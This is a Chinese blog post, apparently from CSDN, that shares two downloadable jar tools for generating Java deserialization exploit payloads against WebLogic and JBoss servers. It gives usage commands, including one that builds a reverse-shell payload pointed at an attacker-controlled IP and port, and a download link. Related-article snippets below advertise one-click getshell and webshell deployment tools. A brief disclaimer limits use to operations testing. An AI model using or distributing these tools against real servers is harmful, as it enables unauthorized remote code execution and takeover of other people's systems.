Java反序列化漏洞之Weblogic、Jboss利用之payload生成工具

最新推荐文章于 2024-09-10 09:07:08 发布
最新推荐文章于 2024-09-10 09:07:08 发布
阅读量1.7k 收藏 3
点赞数
文章标签: java反序列化漏洞 生成payload
为了方便小伙伴们使用,我导出了两个jar包,分别用于制作反弹shell的payload和测试的payload。

     使用方法和利用方法请仔细看下面的截图:

     1、制作反弹shell的payload并利用:

      命令:
java -jar makeshell.jar 你的IP 监听端口 payload名
如:
java -jar makeshell.jar 202.112.221.32 8888 D:\\java\\shellpayload

 


 1、制作POC的payload并利用:

      命令:
java -jar makepoc.jar 请求的URL payload名
如:
java -jar makpoc.jar http://www.xxxxx.org/xxooxxooxxoo.txt D:\\java\\pocpayload

 


脚本下载: http://pan.baidu.com/s/1hrfjdDM


仅供运维测试漏洞,请勿非法使用,否则后果自负!
aaa0404524
关注
WebLogic反序列化漏洞复现+利用工具(CVE-2021-2394)
0xSec
04-08 4573
Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞WebLogic Server组件进行攻击。成功利用漏洞的攻击者可以接管WebLogic Server。这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。
java反序列化漏洞挖掘
qq_45001989的博客
09-08 1175
java反序列化漏洞挖掘 1.漏洞触发场景 在java编写的web应用与web服务器间java通常会发送大量的序列化对象例如以下场景:   1)HTTP请求中的参数,cookies以及Parameters。   2)RMI协议,被广泛使用的RMI协议完全基于序列化   4)JMX 同样用于处理序列化对象   5)自定义协议 用来接收与发送原始的java对象 漏洞挖掘   (1)确定反序列化输入点     首先应找出readObject方法调用,在找到之后进行下一步的注入操作。一般可以通过以下方法进行查找:
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
Java反序列化生成Payload利用脚本
02-12
Java反序列化生成Payload利用脚本,帮助运维测试weblogicjboss等中间件的漏洞
工具分享 | WeblogicScan - Weblogic漏洞检测工具,一键getshell。
最新发布
IT软件汇
09-10 316
WeblogicScan是一个Weblogic一键漏洞检测工具,可以帮助开发人员快速找出Weblogic漏洞从而进行修复,避免伤害。
Java反序列化漏洞利用工具WebLogic&Jboss
01-01
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
JBOSS反序列化漏洞工具
03-28
通过JBOSS4 commons-collections.jar包的反序列化类InvokerTransformer, InstantiateFactory 和 InstantiateTransfromer class 文件可以远程操控服务器
Jboss反序列化漏洞
arissa666的博客
10-14 295
执行命令,因为存在jboss存在漏洞,所以执行命令得到结果。找一下jboss的目录 dir /s c:\*.jsp。在自己上传的文件上执行命令得到自己想要的信息。看下server.xml 端口设置的多少。给这个目录上传一个脚本csits.jsp。结构是IP:端口/文件夹/脚本文件名。先选一个jboss目录上传试一下。用jboss反序列工具进行扫描。run.bat运行jboss。上传后在当前目录就可以看到。登录密码whoami。
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞利用工具可能包含了一系列的payload(攻击载荷)和脚本,这些可以用来模拟攻击,检查JBOSSWebLogic是否容易受到反序列化攻击。其中,JBOSS_EXP.jar可能是用于攻击JBOSS服务器的特定工具。 关于...
Java反序列化工具.zip
05-31
标题"Java反序列化工具.zip"暗示了这个压缩包包含了一些工具,这些工具可能是为了帮助开发者理解、测试或者防御Java反序列化漏洞而设计的。可能包括模拟攻击的payload生成器,或者用于检测和修复此类漏洞的分析工具...
Java反序列化漏洞利用工具WebLogic&Jboss;)
10-10
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
CVE-2017-12149漏洞利用工具,针对该漏洞快速方便的进行利用
JAVA反序列化jboss 进入后台(及送JAVA反序列化工具和中国cai dao)
12-10
JAVA反序列化教程,利用JAVA反序列化软件进行检测,寻找,已经涉及到部分CMD命令和寻找网页IP,以及远程登陆简单介绍
java反序列化漏洞利用工具WebLogicExploit
01-14
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
Weblogic 反序列化漏洞检查工具CVE-2017-10271.zip
07-09
Weblogic 反序列化漏洞检查工具CVE-2017-10271.zip
java反序列化漏洞利用工具_红队攻击之利用jboss反序列化获取目标权限漏洞梳理
weixin_39963287的博客
12-02 706
JBOSS AS 6.x反序列化(CVE-2017-12149)漏洞影响5.x和6.x版本的JBOSSAS1、检测目录 192.168.28.138:60899/invoker/readonly2、Linux下编译java代码,然后生成反弹shell序列化文件,内容较长,可私信“jboss”获取代码javac -cp .:commons-collections-3.2.1.jar ReverseS...
探索高效安全的Payload生成工具:MSFVenom Payload Creator(MSFPC)
gitblog_00010的博客
05-15 424
探索高效安全的Payload生成工具:MSFVenom Payload Creator(MSFPC) msfpcMSFvenom Payload Creator (MSFPC)项目地址:https://gitcode.com/gh_mirrors/ms/msfpc 在渗透测试和网络安全研究中,能够快速生成多种Meterpreter类型的payload是至关重要的。这就是MFSVenom Payl...
weblogic AND jboss 反序列化漏洞
diecai2192的博客
04-27 194
1.weblogic反序列化漏洞 通过java反序列化漏洞利用工具验证,如图6可知,该漏洞是存在的. 现在我们可以执行命令,文件管理, 上传shell 遇到一个问题,我们选择webshell上传,但是上传我们需要一个我们能进行web访问的路径,但是路径在哪找呢? --------我们可以通过查看页面中的图片属性,然后来进行web路径的寻找。通过F12源码审查,我们可以获取到相关图片的路...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值